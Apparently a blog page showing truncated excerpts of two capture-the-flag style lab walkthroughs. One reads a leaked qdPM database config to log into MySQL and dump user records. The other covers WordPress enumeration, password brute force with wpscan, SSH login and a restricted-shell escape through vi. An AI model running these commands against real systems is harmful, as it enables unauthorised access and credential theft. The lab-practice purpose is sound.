Posts

sql misconfiguration and privesc with path vulnerbility

Image
  sql misconfiguration and privesc with path vulnerability 1 nmap 10.10.134.21 -sV . -sV = Probe open ports to determine service/version info. 2 search ip in browser to show admin page. . qdPM 9.2 = show website version. 3 check version is exploitable or not. . version is exploitable. . check last line in exploit this link to install yml file link = http://<website>/core/config/databases.yml 4 Download yml file to see username name and password for mysql databse. 5 chek yml file. 6 enter mysql dabatse use username and password. # mysql -h 10.10.134.21 -u qdpmadmin -p . -h = host . -u = username. . -p = password 7 show mysql databses. # show databases; . to show all dabatbase in mysql. 8 go staff database and show tables. # use staff # show tables; . this colum to informatin about staff informatin 9 show user table data to information about usernames. # select * from user; . * = selcet all data. . To show all users. . and copy all user and make list for users. EX:- nano user....
Post a Comment
Read more

BUG REPORT

Image
  BUG REPORT . # = means commands . 1-6 = show my steps 1 netdiscover. # netdiscover -r [192.168.159.133] . netdiscover = find network traffic ips and mac address. . -r = range: scan a given range instead of auto scan. 192.168.6.0/24,/16,/8 2 nmap # nmap -p- [192.168.159.133] -sV . -p- = bydefault all ports scan tcp ex: 65535 . -sV = Probe open ports to determine service/version info 3 wpscan. # wpscan --url http://dc-2/ -e . --url = target url scan . -e = enumerate ex: username. #wpscan --url http://dc-2/ -U /home/kali/usr -P /home/kali/pass.txt . -U = usernames LIST . -P password LIST 3 aceess. # ssh tom@192.168.159.133 -p 7744 . access the tom users on port 7744. 4 change shell for this machine for the root access # vi flag3.txt and :set shell=/bin/bash after that call the shell 5 To run all linux commands LIKE:- cat , cd , su , sudo etc. # export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/local/games:/usr/game...
Post a Comment
Read more